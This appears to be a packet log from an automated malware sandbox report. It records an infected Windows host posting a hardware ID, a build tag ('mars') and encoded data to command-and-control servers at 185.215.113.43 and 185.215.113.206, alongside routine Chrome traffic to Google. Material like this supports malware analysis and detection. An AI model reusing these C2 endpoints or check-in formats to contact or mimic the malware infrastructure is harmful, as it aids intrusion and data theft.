Nov 22, 2024 20:37:15.408097982 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 36 32 37 37 35 42 35 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB62775B55C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 22, 2024 20:37:16.855007887 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Nov 2024 19:37:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.4	50033	185.215.113.206	80

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 20:37:25.317188025 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 22, 2024 20:37:26.656980038 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:37:26 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 22, 2024 20:37:26.769696951 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJJJKEHCAKFBFHJKEHCF Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 36 38 37 42 34 42 30 35 45 33 46 33 32 33 35 31 31 34 31 39 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 46 2d 2d 0d 0a Data Ascii: ------JJJJKEHCAKFBFHJKEHCFContent-Disposition: form-data; name="hwid"7687B4B05E3F3235114199------JJJJKEHCAKFBFHJKEHCFContent-Disposition: form-data; name="build"mars------JJJJKEHCAKFBFHJKEHCF--
Nov 22, 2024 20:37:27.236258030 CET	210	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:37:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49734	142.250.181.100	443	7992	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:35:12 UTC	607	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-22 19:35:13 UTC	1266	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:35:12 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-22jmdSifHMD0gv58hOR-0Q' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-22 19:35:13 UTC	124	IN	Data Raw: 64 36 61 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 76 69 6e 74 61 67 65 20 62 72 6f 6e 63 6f 73 20 66 6f 72 64 20 6c 61 77 73 75 69 74 22 2c 22 73 74 6f 72 79 62 6f 6f 6b 20 76 61 6c 65 20 64 69 73 6e 65 79 20 64 72 65 61 6d 6c 69 67 68 74 20 76 61 6c 6c 65 79 22 2c 22 75 73 20 6e 61 76 79 20 79 65 6f 6d 61 6e 20 6b 65 6e 64 72 61 20 6d 63 64 61 6e 69 65 6c 22 2c 22 73 6e Data Ascii: d6a)]}'["",["vintage broncos ford lawsuit","storybook vale disney dreamlight valley","us navy yeoman kendra mcdaniel","sn
2024-11-22 19:35:13 UTC	1390	IN	Data Raw: 6f 77 20 73 74 6f 72 6d 20 77 65 61 74 68 65 72 20 66 6f 72 65 63 61 73 74 22 2c 22 63 72 69 63 6b 65 74 20 61 75 73 74 72 61 6c 69 61 22 2c 22 6b 65 69 74 68 20 6c 65 65 20 73 75 73 68 69 20 72 65 73 74 61 75 72 61 6e 74 22 2c 22 6a 61 6d 65 73 20 77 65 62 62 20 74 65 6c 65 73 63 6f 70 65 22 2c 22 64 6f 67 65 63 6f 69 6e 20 70 72 69 63 65 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 Data Ascii: ow storm weather forecast","cricket australia","keith lee sushi restaurant","james webb telescope","dogecoin price"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d
2024-11-22 19:35:13 UTC	1390	IN	Data Raw: 45 54 55 46 34 52 45 56 42 4e 47 55 7a 54 6a 46 32 64 58 70 69 62 30 78 43 4e 7a 46 36 4f 46 42 33 4d 32 68 6d 61 47 38 7a 64 56 42 33 62 56 51 31 4e 6d 70 45 57 55 4a 48 5a 32 4a 6f 61 6c 56 71 62 45 35 44 57 46 49 78 4f 47 52 6d 4c 7a 4e 4f 4e 43 74 4f 64 6e 5a 36 63 30 39 56 57 6d 30 76 4d 6a 4d 35 63 6e 6c 6f 64 47 52 7a 51 6c 52 47 61 45 6c 6f 4d 57 39 36 5a 58 70 54 59 30 78 61 4d 6a 6c 43 63 33 6f 72 4e 33 42 53 61 30 52 43 56 6b 64 78 55 6d 70 6f 54 47 70 35 56 6b 35 71 54 30 70 4b 4e 6a 64 4b 61 31 70 71 61 30 6b 79 4d 57 78 70 54 6b 77 34 5a 6e 42 4b 63 30 4d 72 53 55 31 43 5a 56 45 76 62 57 74 58 55 48 6f 72 4b 31 6c 32 62 6c 41 72 56 48 70 46 4d 6d 74 76 4d 56 4e 48 61 32 4e 56 4f 55 68 74 62 45 68 6b 51 6b 56 6e 53 6d 6c 53 51 31 4e 59 65 46 Data Ascii: ETUF4REVBNGUzTjF2dXpib0xCNzF6OFB3M2hmaG8zdVB3bVQ1NmpEWUJHZ2JoalVqbE5DWFIxOGRmLzNONCtOdnZ6c09VWm0vMjM5cnlodGRzQlRGaEloMW96ZXpTY0xaMjlCc3orN3BSa0RCVkdxUmpoTGp5Vk5qT0pKNjdKa1pqa0kyMWxpTkw4ZnBKc0MrSU1CZVEvbWtXUHorK1l2blArVHpFMmtvMVNHa2NVOUhtbEhkQkVnSmlSQ1NYeF
2024-11-22 19:35:13 UTC	537	IN	Data Raw: 32 67 78 63 56 68 6c 64 48 56 48 5a 45 5a 46 59 6a 6c 31 62 6e 55 7a 54 45 52 69 56 6d 74 43 53 6b 6c 72 4f 56 52 7a 59 54 4e 4b 55 57 73 72 61 33 52 7a 54 6b 59 7a 57 48 42 68 4e 32 4a 69 53 57 67 76 61 44 5a 4e 54 69 39 36 53 58 4e 57 56 6e 6c 4c 63 58 5a 76 52 44 42 59 52 6e 42 33 4d 30 30 34 64 57 56 73 4e 31 55 32 64 7a 4a 4e 57 46 5a 57 4d 33 68 4b 64 6b 74 49 62 54 4e 4b 61 33 45 35 5a 31 70 6d 55 7a 68 43 63 46 6c 34 53 7a 4e 58 62 46 6c 31 63 47 6f 7a 4d 58 68 54 64 6a 42 77 53 47 74 42 65 6e 56 4f 54 58 42 59 55 33 42 53 4e 6d 4a 5a 54 47 74 71 64 47 5a 6a 5a 6e 68 74 4d 44 68 46 4b 33 42 55 4e 6d 52 6c 61 47 64 42 55 48 5a 56 4f 45 4d 77 5a 33 52 47 56 48 56 31 4d 54 46 76 51 53 74 70 63 33 67 78 54 6c 55 31 4d 6d 4e 6b 4e 45 39 75 52 46 56 43 Data Ascii: 2gxcVhldHVHZEZFYjl1bnUzTERiVmtCSklrOVRzYTNKUWsra3RzTkYzWHBhN2JiSWgvaDZNTi96SXNWVnlLcXZvRDBYRnB3M004dWVsN1U2dzJNWFZWM3hKdktIbTNKa3E5Z1pmUzhCcFl4SzNXbFl1cGozMXhTdjBwSGtBenVOTXBYU3BSNmJZTGtqdGZjZnhtMDhFK3BUNmRlaGdBUHZVOEMwZ3RGVHV1MTFvQStpc3gxTlU1MmNkNE9uRFVC
2024-11-22 19:35:13 UTC	463	IN	Data Raw: 31 63 38 0d 0a 64 58 4e 30 63 6d 46 73 61 57 46 4b 42 79 4d 34 4f 44 63 33 4d 44 42 53 50 57 64 7a 58 33 4e 7a 63 44 31 6c 53 6e 70 71 4e 48 52 55 55 44 46 55 59 33 64 4e 61 57 6c 32 54 45 52 43 5a 7a 6c 43 53 6b 31 4d 63 33 42 4e 65 6d 73 30 64 46 56 56 5a 33 4e 4d 55 7a 52 77 55 33 4e 36 53 6c 52 42 55 55 46 71 4d 30 31 4c 53 30 46 77 42 77 5c 75 30 30 33 64 5c 75 30 30 33 64 22 2c 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 72 65 6c 65 76 61 6e 63 65 22 3a 5b 31 32 35 37 2c 31 32 35 36 2c 31 32 35 35 2c 31 32 35 34 2c 31 32 35 33 2c 31 32 35 32 2c 31 32 35 31 2c 31 32 35 30 5d 2c 22 67 6f 6f 67 6c Data Ascii: 1c8dXN0cmFsaWFKByM4ODc3MDBSPWdzX3NzcD1lSnpqNHRUUDFUY3dNaWl2TERCZzlCSk1Mc3BNems0dFVVZ3NMUzRwU3N6SlRBUUFqM01LS0FwBw\u003d\u003d","zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"googl
2024-11-22 19:35:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49735	142.250.181.100	443	7992	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:35:12 UTC	353	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49736	142.250.181.100	443	7992	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:35:12 UTC	510	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-22 19:35:13 UTC	1119	IN	HTTP/1.1 200 OK Version: 698289427 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Save-Data Accept-CH: Downlink Accept-CH: ECT Accept-CH: RTT Accept-CH: Device-Memory Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Fri, 22 Nov 2024 19:35:12 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-22 19:35:13 UTC	271	IN	Data Raw: 31 64 30 66 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 1d0f)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2024-11-22 19:35:13 UTC	1390	IN	Data Raw: 75 30 30 33 64 5c 22 67 62 5f 50 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 6b 64 20 67 62 5f 6f 64 20 67 62 5f 46 64 20 67 62 5f 6c 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 Data Ascii: u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabind
2024-11-22 19:35:13 UTC	1390	IN	Data Raw: 72 6f 6c 65 5c 75 30 30 33 64 5c 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 61 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 Data Ascii: role\u003d\"presentation\"\u003e\u003c\/span\u003e\u003c\/a\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdi
2024-11-22 19:35:13 UTC	1390	IN	Data Raw: 68 3f 73 6f 75 72 63 65 5c 75 30 30 33 64 6e 74 70 5c 22 20 74 61 72 67 65 74 5c 75 30 30 33 64 5c 22 5f 74 6f 70 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 73 76 67 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 Data Ascii: h?source\u003dntp\" target\u003d\"_top\" role\u003d\"button\" tabindex\u003d\"0\"\u003e \u003csvg class\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42
2024-11-22 19:35:13 UTC	1390	IN	Data Raw: 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 36 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 32 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 Data Ascii: ,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM6,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM12,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0
2024-11-22 19:35:13 UTC	1390	IN	Data Raw: 74 72 6f 6c 2d 6c 61 62 65 6c 30 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 31 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 32 22 5d 2c 22 6d 65 6e 75 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 22 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 30 36 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 Data Ascii: trol-label0","left_product_control-label1","left_product_control-label2"],"menu_placeholder_label":"menu-content","metadata":{"bar_height":60,"experiment_id":[3700306,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access
2024-11-22 19:35:13 UTC	226	IN	Data Raw: 61 63 68 65 2d 32 2e 30 5c 6e 2a 2f 5c 6e 76 61 72 20 49 64 3b 5f 2e 47 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 61 2e 6c 65 6e 67 74 68 3b 69 66 28 62 5c 75 30 30 33 65 30 29 7b 63 6f 6e 73 74 20 63 5c 75 30 30 33 64 41 72 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 49 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 48 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 0d 0a Data Ascii: ache-2.0\n*/\nvar Id;_.Gd\u003dfunction(a){const b\u003da.length;if(b\u003e0){const c\u003dArray(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Id\u003dfunction(a){return new _.Hd(b\u003d\u003eb.substr(0,
2024-11-22 19:35:13 UTC	295	IN	Data Raw: 31 32 30 0d 0a 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 4a 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 4b 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 7d 7d 3b 5f 2e 4c 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 4b 64 28 5c 22 61 62 6f 75 74 3a 69 6e 76 61 6c 69 64 23 7a 43 6c 6f 73 75 72 65 7a 5c 22 29 3b 5f 2e 48 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 66 68 5c 75 30 30 33 Data Ascii: 120a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Jd\u003dglobalThis.trustedTypes;_.Kd\u003dclass{constructor(a){this.i\u003da}toString(){return this.i}};_.Ld\u003dnew _.Kd(\"about:invalid#zClosurez\");_.Hd\u003dclass{constructor(a){this.fh\u003
